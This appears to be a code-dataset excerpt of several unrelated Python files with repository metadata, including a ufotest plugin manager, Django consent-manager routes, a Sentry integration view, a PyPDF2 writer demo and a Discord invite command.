a function with the according hook decorator and supply a string identifier for which hook to use. The function
will then be registered within the plugin manager and wait there until the according hook is actually called from
within the main routine.
The plugin system differentiates between two types of hooks: *action* hooks dont have a return value, if a function
is hooked into an action hook, this just means that it will be executed at a certain point. *filter* hooks on the
other side have a return value. Filter hooks present the possibility to modify certain key data structures during
the execution of the main ufotest routine.
**USING THE PLUGIN MANAGER**
Alongside the config instance for ufotest, the plugin manager instance is the second most important thing. It has
to be accessible by all parts of the code at any time. This is because the individual parts of the code actually
invoke the special hooks by referencing the plugin manager. To create a new instance of the pm it only needs the
folder which is supposed to contain the plugins. After creating the instance, the "load_plugins" method has to be
used to actually load the plugins from that folder. At this point the internal dicts "filters" and "actions"
already contain all the callable instance linked to the specific hooks, just waiting to be executed. Invoking a
hook within the main routine can be done with the "do_action" and "apply_filter" methods.
.. code-block:: python
pm = PluginManager("/path/to/plugins")
pm.load_plugins()
# Some time later
data = {}
data_filtered = pm.apply_filter("custom_filter", data)
pm.do_action("custom_action")
**LOADING THE PLUGINS**
The plugins themselves are dynmically imported during the runtime of the ufotest routine. The plugin manager will
attempt to import the plugins from the folder which was passed to its constructor. Some important assumptions are
made about what constitutes a valid plugin:
- Each plugin is assumed to be a FOLDER. The folder name will be used as the plugin name, by which it will be
identified
- Within each plugin folder there has to be at least a "main.py" python module. This is what is actually imported
by the plugin system. Consequentially, all of it's top level code will be executed on import time.
- Important detail: Folders starting with an underscore will be ignored! This is mainly a pragmatic choice to make
sure that the plugin system does not attempt to import __pycache__ but can also be used to quickly disable
plugins
"""
def __init__(self, plugin_folder_path: str = ''):
self.plugin_folder_path = os.path.expandvars(plugin_folder_path)
self.plugins = {}
self.filters = defaultdict(list)
self.actions = defaultdict(list)
# -- For invoking hooks in the main system --
def do_action(self, hook_name: str, *args, **kwargs) -> None:
"""
Executes all the plugin functions which have been hooked to the action hook identified by *hook_name*.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: The string name identifying the hook to be executed.
:return: void
"""
if hook_name in self.actions.keys():
callback_specs = sorted(self.actions[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
callback(*args, **kwargs)
def apply_filter(self, hook_name: str, value: Any, *args, **kwargs) -> Any:
"""
Applies all the plugin callback functions which have been hooked to the filter hook identified by *hook_name*
to filter the given *value*. The result of each filter operation is then passed as the value argument to the
next filter callback in order of priority.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: THe string name identifying the hook to be executed.
:param value: Whatever value that specific hook is supposed to manipulate
:return: The manipulated version of the passed value argument
"""
filtered_value = value
if hook_name in self.filters.keys():
callback_specs = sorted(self.filters[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
filtered_value = callback(filtered_value, *args, **kwargs)
return filtered_value
# -- For registering hook callbacks in the plugins --
def register_filter(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new filter *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked. Since this is a filter hook, the callback needs to accept at least one argument which is the
value to be filtered and it also needs to return a manipulated version of this value.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.filters[hook_name].append({
'callback': callback,
'priority': priority
})
def register_action(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new action *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.actions[hook_name].append({
'callback': callback,
'priority': priority
})
# -- Loading the plugins --
    def load_plugins(self):
        """
        Loads all the plugins from the plugin folder which was passed to the constructor of the manager instance.
        After this method was executed, it can be assumed that the internal dicts "filters" and "actions" contain all
        the callable instance linked to the according hook names.

        Only the *immediate* sub folders of the plugin folder are considered (see the ``break``
        below); folders whose name starts with an underscore or a dot are skipped.

        :return: void
        """
        for root, folders, files in os.walk(self.plugin_folder_path, topdown=True):
            for folder_name in folders:
                # IMPORTANT: We will ignore all folders which start with and underscore. The very practical reason for
                # this is that the plugins folder will almost certainly contain a __pycache__ folder which obviously
                # is not a ufotest plugin and thus cause an error. But this behaviour is also nice to disable certain
                # plugins without removing them completely: simply rename them to start with an underscore
                # 2.0.0 - 29.11.2021: We also need to ignore folders which start with a dot, as these are the linux
                # hiddenfolders. There were issues with runaway .idea and .git folders being attempted for import.
                if folder_name[0] in ['_', '.']:
                    continue
                plugin_path = os.path.join(root, folder_name)
                plugin_name, module = self.import_plugin_by_path(plugin_path)
                self.plugins[plugin_name] = module
            # 2.0.0 - 29.11.2021: So as to not accidentally attempt to import all plugin subfolders as plugins as well.
            # This was previously a bug
            break
def reset(self):
"""
Resets the plugin manager, which means that it unloads all registered filter and action hooks. Also clears the
internal reference to all the plugin modules.
:returns: void
"""
self.filters = defaultdict(list)
self.actions = defaultdict(list)
self.plugins = {}
    @classmethod
    def import_plugin_by_path(cls, path: str) -> Tuple[str, Any]:
        """
        Given the path of a folder, this method will attempt to dynamically import a "main.py" module within this
        folder interpreting it as a ufotest plugin.

        :param path: The string path of the plugin folder; its basename is used as the plugin name.
        :raises FileNotFoundError: If the folder does not contain a "main.py" module.
        :return: A tuple of two elements, where the first is the string name of the plugin and the second is the
        imported module instance.
        """
        plugin_name = os.path.basename(path)
        plugin_main_module_path = os.path.join(path, 'main.py')
        if not os.path.exists(plugin_main_module_path):
            raise FileNotFoundError((
                f'Cannot import folder "{plugin_name}" as an ufotest plugin, because the folder does not contain a '
                f'main.py python module. All ufotest plugins need to have a main.py file! This is the top level file '
                f'which is imported to import the plugins functionality into the ufotest system.\n '
                f'Path being checked: {plugin_main_module_path}'
            ))
        # 29.11.2021
        # This will add the parent folder in which the actual plugin folder resides to the plugin path. This is due to
        # a problem with the plugins: Prior imports of another plugin module from the plugins main.py module did not
        # work.
        plugin_folder = os.path.dirname(path)
        if plugin_folder not in sys.path:
            sys.path.append(plugin_folder)
        # Import main.py under the plugin's name and execute its top level code
        spec = importlib.util.spec_from_file_location(plugin_name, plugin_main_module_path)
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        # Registering the module under its plugin name makes it importable by other plugins
        sys.modules[plugin_name] = module
        return plugin_name, module
| 211 | 0 | 26 |
5d86b35f3db11dad55a452934b8cb9df5ddcae92 | 951 | py | Python | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | """
"""
# Training entry point for the SiameseNet application: parses CLI arguments,
# configures the Keras/TensorFlow session and launches training on the dataset.
import argparse
import os
import h5py
import keras.backend.tensorflow_backend as ktf
import tensorflow as tf
from applications.config import get_siamese_config
from applications.siamesenet import run_net
from core.data import build_siamese_data, load_siamese_data
from core.util import get_session
# add directories in src/ to path
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# PARSE ARGUMENTS
parser = argparse.ArgumentParser()
# NOTE(review): '--gpu' is parsed but not referenced in this module — presumably
# consumed inside get_siamese_config/get_session; confirm before removing.
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
# argparse applies type=float to the string default '1.0', so the attribute is a float
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='1.0')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
# Bind a session limited to the requested GPU memory fraction to Keras
ktf.set_session(get_session(args.gpu_memory_fraction))
params = get_siamese_config(args)
data = load_siamese_data(params['data_path'], args.dset)
# RUN Train
run_net(data, params)
| 28.818182 | 101 | 0.774974 | """
"""
# Training entry point for the SiameseNet application: parses CLI arguments,
# configures the Keras/TensorFlow session and launches training on the dataset.
import argparse
import os
import h5py
import keras.backend.tensorflow_backend as ktf
import tensorflow as tf
from applications.config import get_siamese_config
from applications.siamesenet import run_net
from core.data import build_siamese_data, load_siamese_data
from core.util import get_session
# add directories in src/ to path
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# PARSE ARGUMENTS
parser = argparse.ArgumentParser()
# NOTE(review): '--gpu' is parsed but not referenced in this module — presumably
# consumed inside get_siamese_config/get_session; confirm before removing.
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
# argparse applies type=float to the string default '1.0', so the attribute is a float
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='1.0')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
# Bind a session limited to the requested GPU memory fraction to Keras
ktf.set_session(get_session(args.gpu_memory_fraction))
params = get_siamese_config(args)
data = load_siamese_data(params['data_path'], args.dset)
# RUN Train
run_net(data, params)
| 0 | 0 | 0 |
218b5905c37ae4ce27c82b8d0a072722a71447ef | 2,657 | py | Python | consent_manager/consent_manager/urls.py | crs4/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 5 | 2018-05-16T22:58:01.000Z | 2020-01-14T11:12:17.000Z | consent_manager/consent_manager/urls.py | PhilanthroLab/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 10 | 2018-04-13T15:56:49.000Z | 2019-12-05T08:57:47.000Z | consent_manager/consent_manager/urls.py | PhilanthroLab/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 6 | 2019-10-02T08:39:12.000Z | 2020-06-23T00:18:03.000Z | # Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# URL routing for the consent manager service: authentication, admin and the
# versioned consent REST endpoints.
from django.urls import path, include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import permissions
from consent_manager import settings, views
from gui import views as fr_views
from hgw_common.settings import VERSION_REGEX
# NOTE(review): `permissions` is imported but unused in this module — confirm
# before removing.
urlpatterns = [
    path(r'', fr_views.home),
    path(r'login/', fr_views.perform_login),
    path(r'logout/', fr_views.perform_logout),
    path(r'admin/', admin.site.urls),
    path(r'saml2/', include('djangosaml2.urls')),
    path(r'oauth2/', include('oauth2_provider.urls')),
    path(r'protocol/', include('hgw_common.urls')),
    path(r'confirm_consents/', views.confirm_consent),
    # REST endpoints, all prefixed with the API version taken from VERSION_REGEX
    path(r'{}/consents/confirm/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'confirm'})),
    path(r'{}/consents/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke_list'}),
         name='consents_revoke'),
    path(r'{}/consents/find/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'find'}),
         name='consents_find'),
    path(r'{}/consents/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'list', 'post': 'create'}),
         name='consents'),
    # NOTE(review): this route and the one below share the name 'consents_retrieve';
    # reverse('consents_retrieve') can only resolve to one of them — confirm intended.
    path(r'{}/consents/<str:consent_id>/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke'}),
         name='consents_retrieve'),
    path(r'{}/consents/<str:consent_id>/'.format(VERSION_REGEX),
         views.ConsentView.as_view({'get': 'retrieve', 'put': 'update'}),
         name='consents_retrieve'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 51.096154 | 118 | 0.733534 | # Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# URL routing for the consent manager service: authentication, admin and the
# versioned consent REST endpoints.
from django.urls import path, include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import permissions
from consent_manager import settings, views
from gui import views as fr_views
from hgw_common.settings import VERSION_REGEX
# NOTE(review): `permissions` is imported but unused in this module — confirm
# before removing.
urlpatterns = [
    path(r'', fr_views.home),
    path(r'login/', fr_views.perform_login),
    path(r'logout/', fr_views.perform_logout),
    path(r'admin/', admin.site.urls),
    path(r'saml2/', include('djangosaml2.urls')),
    path(r'oauth2/', include('oauth2_provider.urls')),
    path(r'protocol/', include('hgw_common.urls')),
    path(r'confirm_consents/', views.confirm_consent),
    # REST endpoints, all prefixed with the API version taken from VERSION_REGEX
    path(r'{}/consents/confirm/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'confirm'})),
    path(r'{}/consents/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke_list'}),
         name='consents_revoke'),
    path(r'{}/consents/find/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'find'}),
         name='consents_find'),
    path(r'{}/consents/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'list', 'post': 'create'}),
         name='consents'),
    # NOTE(review): this route and the one below share the name 'consents_retrieve';
    # reverse('consents_retrieve') can only resolve to one of them — confirm intended.
    path(r'{}/consents/<str:consent_id>/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke'}),
         name='consents_retrieve'),
    path(r'{}/consents/<str:consent_id>/'.format(VERSION_REGEX),
         views.ConsentView.as_view({'get': 'retrieve', 'put': 'update'}),
         name='consents_retrieve'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 0 | 0 | 0 |
e449ed54a476bf75fa0b35cf1c0a2f427c5e7128 | 2,944 | py | Python | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.http import urlencode
from django.http import HttpResponseRedirect
from sentry.integrations.pipeline import IntegrationPipeline
from sentry.web.frontend.base import BaseView
from sentry.models import Organization
| 35.902439 | 106 | 0.650815 | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.http import urlencode
from django.http import HttpResponseRedirect
from sentry.integrations.pipeline import IntegrationPipeline
from sentry.web.frontend.base import BaseView
from sentry.models import Organization
class ExternalIntegrationPipeline(IntegrationPipeline):
    """Integration pipeline whose success step redirects the browser to the
    integration's settings page instead of rendering a dialog."""

    def _dialog_success(self, _org_integration):
        # Carry a "next" page through as a query string when the request has one
        if "next" in self.request.GET:
            param_string = u"?%s" % urlencode({"next": self.request.GET["next"]})
        else:
            param_string = ""
        redirect_uri = u"/settings/%s/integrations/%s/%s/%s" % (
            self.organization.slug,
            self.provider.integration_key,
            self.integration.id,
            param_string,
        )
        return HttpResponseRedirect(redirect_uri)
class IntegrationExtensionConfigurationView(BaseView):
    """
    Entry point for configuring an externally-initiated integration: handles login
    redirection, organization selection and finally kicks off the integration pipeline.
    """
    # Reachable before login; unauthenticated users are redirected to the login
    # page with a "next" parameter pointing back to this configure URL.
    auth_required = False
    def get(self, request, *args, **kwargs):
        """Resolve the target organization and start the integration pipeline."""
        if not request.user.is_authenticated():
            # Bounce through login and come back here afterwards, preserving the
            # original query parameters.
            configure_uri = u"/extensions/{}/configure/?{}".format(
                self.provider, urlencode(request.GET.dict()),
            )
            redirect_uri = u"{}?{}".format(
                reverse("sentry-login"), urlencode({"next": configure_uri})
            )
            return self.redirect(redirect_uri)
        # check if we have one org
        organization = None
        if request.user.get_orgs().count() == 1:
            organization = request.user.get_orgs()[0]
        # if we have an org slug in the query param, use that org
        elif "orgSlug" in request.GET:
            organization = Organization.objects.get(slug=request.GET["orgSlug"])
        if organization:
            # if org does not have the feature, redirect
            if not self.is_enabled_for_org(organization, request.user):
                return self.redirect("/")
            # TODO(steve): we probably should check the user has permissions and show an error page if not
            pipeline = self.init_pipeline(request, organization, request.GET.dict())
            return pipeline.current_step()
        # No unambiguous organization: redirect to the extension's link page.
        return self.redirect(
            u"/extensions/{}/link/?{}".format(self.provider, urlencode(request.GET.dict()))
        )
    def init_pipeline(self, request, organization, params):
        """Build and initialize the pipeline for *organization*, seeding it with
        the (possibly transformed) request params and the acting user's id."""
        pipeline = ExternalIntegrationPipeline(
            request=request, organization=organization, provider_key=self.external_provider_key
        )
        pipeline.initialize()
        pipeline.bind_state(self.provider, self.map_params_to_state(params))
        pipeline.bind_state("user_id", request.user.id)
        return pipeline
    def map_params_to_state(self, params):
        """Hook for subclasses to transform query params into pipeline state."""
        return params
    def is_enabled_for_org(self, _org, _user):
        """Hook for subclasses to gate the feature per organization; enabled by default."""
        return True
| 2,352 | 201 | 72 |
f9f1ab3479a8fdfb4a582f1ffff596182f66eccb | 90 | py | Python | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | lis=[(1,2,3),[1,2],['a','hit','less']]
# Flatten the mixed list of tuples/lists (`lis`) into one flat list, preserving order.
ils = []
for group in lis:
    ils.extend(group)
print(ils)
| 15 | 39 | 0.488889 | lis=[(1,2,3),[1,2],['a','hit','less']]
# Flatten the mixed list of tuples/lists (`lis`) into one flat list, preserving order.
ils = []
for group in lis:
    ils.extend(group)
print(ils)
| 0 | 0 | 0 |
0085ac811da723708422c8c30d24151ea39a0afd | 2,010 | py | Python | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | from PyPDF2 import PdfFileReader, PdfFileWriter
# Demonstrates PyPDF2's PdfFileWriter: clones a reader, adds bookmarks/links,
# JavaScript and metadata, strips content, encrypts and writes the result.
file1 = open('pdf1.pdf','rb')
file2 = open('output.pdf','wb')
filer = PdfFileReader(file1)
filew = PdfFileWriter()
#Cloning PDF reader with its properties ; see notes to see other ways to do this
try:
    filew.cloneDocumentFromReader(filer)
except Exception as e:
    print('Not possible to clone PDF File:',e)
try:
    filew.addBookmark('user name',1,color='1',bold=True,italic=False,fit='/Fit')
    filew.addLink(1,3,[30,30,70,70],border=['2','2','4','4'],fit='/Fit')
except Exception as e:
    print('Not possible to addBookmark or to addLink:',e)
#AddsJava script,executes when user opens it, here : printing windows
try:
    filew.addJS("this.print({bUI:true,bSilent:false,bShrinkToFit:true});")
    filew.addMetadata({'/Producer':'/User1','/CreationDate':'/30.08.1996','/CreationProgram':'Adobe Acrobat Reader DC (Windows)'})
except Exception as e:
    print('Not possible to addJS or Metadata:',e)
#Function updatePageFormFieldValues never worked
#try:
# page = filew.getPage(2)
# filew.updatePageFormFieldValues(page,{'/Texte1':'/Bond'})
#except Exception as e:
# print('Not possible to update Field Values:',e)
try:
    filew.removeImages()
    filew.removeText()
    filew.removeLinks()
# BUGFIX: this was a bare `except:` whose handler printed the undefined name `e`,
# which itself raised a NameError whenever the handler actually ran.
except Exception as e:
    print('Not possible to remove Img,Text or Links:',e)
try:
    filew.encrypt('1234',owner_pwd='1234',use_128bit=True)
    print('File encrypted')
except Exception as e:
    print('Not possible to encrypt file:',e)
filew.write(file2)
file2.close()
file1.close()
#MERGING SEVERAL PDF Files :
"""def scan_several_pdf(file1):
    global file_c
    file_c = open(file1,'rb')
    filer = PdfFileReader(file_c)
    filew.appendPagesFromReader(filer)
def main():
    global filew
    filew = PdfFileWriter()
    for item in os.listdir():
        if '.pdf' in item:
            print(item)
            scan_several_pdf(item)
    output = open('output_file.pdf','wb')
    filew.write(output)
    output.close()
    file_c.close()
main()
Most important Metadata Fields on a PDF File :
1. /Producer
2. /CreationDate
3. /Author
4. /Location
"""
| 26.447368 | 127 | 0.722886 | from PyPDF2 import PdfFileReader, PdfFileWriter
# Demonstrates PyPDF2's PdfFileWriter: clones a reader, adds bookmarks/links,
# JavaScript and metadata, strips content, encrypts and writes the result.
file1 = open('pdf1.pdf','rb')
file2 = open('output.pdf','wb')
filer = PdfFileReader(file1)
filew = PdfFileWriter()
#Cloning PDF reader with its properties ; see notes to see other ways to do this
try:
    filew.cloneDocumentFromReader(filer)
except Exception as e:
    print('Not possible to clone PDF File:',e)
try:
    filew.addBookmark('user name',1,color='1',bold=True,italic=False,fit='/Fit')
    filew.addLink(1,3,[30,30,70,70],border=['2','2','4','4'],fit='/Fit')
except Exception as e:
    print('Not possible to addBookmark or to addLink:',e)
#AddsJava script,executes when user opens it, here : printing windows
try:
    filew.addJS("this.print({bUI:true,bSilent:false,bShrinkToFit:true});")
    filew.addMetadata({'/Producer':'/User1','/CreationDate':'/30.08.1996','/CreationProgram':'Adobe Acrobat Reader DC (Windows)'})
except Exception as e:
    print('Not possible to addJS or Metadata:',e)
#Function updatePageFormFieldValues never worked
#try:
# page = filew.getPage(2)
# filew.updatePageFormFieldValues(page,{'/Texte1':'/Bond'})
#except Exception as e:
# print('Not possible to update Field Values:',e)
try:
    filew.removeImages()
    filew.removeText()
    filew.removeLinks()
# BUGFIX: this was a bare `except:` whose handler printed the undefined name `e`,
# which itself raised a NameError whenever the handler actually ran.
except Exception as e:
    print('Not possible to remove Img,Text or Links:',e)
try:
    filew.encrypt('1234',owner_pwd='1234',use_128bit=True)
    print('File encrypted')
except Exception as e:
    print('Not possible to encrypt file:',e)
filew.write(file2)
file2.close()
file1.close()
#MERGING SEVERAL PDF Files :
"""def scan_several_pdf(file1):
    global file_c
    file_c = open(file1,'rb')
    filer = PdfFileReader(file_c)
    filew.appendPagesFromReader(filer)
def main():
    global filew
    filew = PdfFileWriter()
    for item in os.listdir():
        if '.pdf' in item:
            print(item)
            scan_several_pdf(item)
    output = open('output_file.pdf','wb')
    filew.write(output)
    output.close()
    file_c.close()
main()
Most important Metadata Fields on a PDF File :
1. /Producer
2. /CreationDate
3. /Author
4. /Location
"""
| 0 | 0 | 0 |
e97a5cefd11adbaed8f2107bf459f2f361ba895b | 191 | py | Python | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | import unittest
import commentjson
| 19.1 | 43 | 0.774869 | import unittest
import commentjson
class CommentJsonTest(unittest.TestCase):
    """Base test case exposing the commentjson module and its loads/dumps
    callables as class attributes, so tests can use them without importing
    commentjson themselves."""
    json = commentjson
    # staticmethod wrapping prevents the functions from being bound as instance methods
    loads = staticmethod(commentjson.loads)
    dumps = staticmethod(commentjson.dumps)
| 0 | 131 | 23 |
01f1fb2e77ea7fc86324dfc1128000ce1b7d0f74 | 2,907 | py | Python | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 1 | 2021-06-15T07:31:13.000Z | 2021-06-15T07:31:13.000Z | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 1 | 2021-06-01T10:14:32.000Z | 2021-06-02T10:54:12.000Z | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 2 | 2021-06-01T10:59:15.000Z | 2021-06-03T18:29:36.000Z | import discord # type: ignore
from discord.ext import commands # type: ignore
from discord.commands import permissions # type: ignore
from utils import guild_ids
#'''
#'''
'''
def custom_check():
print("Check!")
print((ctx.channel.permissions_for(ctx.guild.me)).send_messages)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
#'''
'''
This is what I used for commands
def allowed_channels(allowed_channels_list):
async def predicate(ctx):
return ctx.guild and (ctx.channel.id in allowed_channels_list)
return commands.check(predicate)
@allowed_channels([PREFIX_COMMAND])
'''
| 45.421875 | 457 | 0.674235 | import discord # type: ignore
from discord.ext import commands # type: ignore
from discord.commands import permissions # type: ignore
from utils import guild_ids
#'''
def custom_check(ctx):
    """Return whether the bot can send messages in the context's channel.

    BUGFIX: the original experiment printed the undefined name ``a`` (a
    guaranteed NameError on every call) and carried an unreachable
    ``predicate``/``commands.check`` block after the first return; both are
    removed. The reachable debug print is kept so observable output where the
    function previously worked is unchanged.
    """
    print("This will be printed on startup")
    return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
#'''
'''
def custom_check():
print("Check!")
print((ctx.channel.permissions_for(ctx.guild.me)).send_messages)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
#'''
'''
This is what I used for commands
def allowed_channels(allowed_channels_list):
async def predicate(ctx):
return ctx.guild and (ctx.channel.id in allowed_channels_list)
return commands.check(predicate)
@allowed_channels([PREFIX_COMMAND])
'''
class invite_cog(commands.Cog):
    """Cog exposing the bot's invite information through both a prefix command
    and a slash command, which share one embed-building helper."""
    def __init__(self, bot) -> None:
        self.client = bot
    @commands.command(name="invite")
    async def invite_command(self, ctx) -> None:
        """Prefix-command entry point; delivers the invite embed as a normal message."""
        await self.invite(ctx, is_response=False)
    #@custom_check()
    #@commands.has_permissions(send_messages=True)
    @commands.slash_command(name="invite", description="Shows info on inviting the bot", guild_ids=guild_ids)#, checks=[custom_check, ])
    async def invite_slash(self, ctx):
        """Slash-command entry point; delivers the invite embed as an interaction response."""
        #if not (ctx.channel.permissions_for(ctx.guild.me)).send_messages:
        #    return await ctx.respond("You're not allowed to do that here.", ephemeral=True)
        await self.invite(ctx, is_response=True)
    #=========================================================================================================================================
    async def invite(self, ctx, is_response: bool = False) -> None:
        """Build the invite embed and send it.

        :param ctx: The command or interaction context.
        :param is_response: When True, reply via ``ctx.respond`` (slash interaction);
            otherwise via ``ctx.send`` (regular message).
        """
        invite_link = "https://discord.com/api/oauth2/authorize?client_id=854722092037701643&permissions=67488768&scope=bot%20applications.commands"
        topgg_link = "https://top.gg/bot/854722092037701643"
        embed = discord.Embed(title=f"Want to invite this bot to your server?", description=f"You can directly add this bot to your server by going on it's profile and clicking 'Add to Server'. Alternatively, go to [this link]({invite_link}) to invite the bot manually, or [this link]({topgg_link}) to see the top.gg page and enjoy all the awesome features. Default prefix is `.` (or slash commands) but can be changed with `.set_prefix`.", colour=0x3498DB)
        embed.set_footer(text=f"Command executed by {ctx.author.display_name} | Community Bot. By the community, for the community.")
        if is_response:
            await ctx.respond(embed=embed)
        else:
            await ctx.send(embed=embed)
| 1,718 | 511 | 45 |
72f3c2e08e9ae118285ffeb74909e773b471c6c8 | 20,579 | py | Python | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
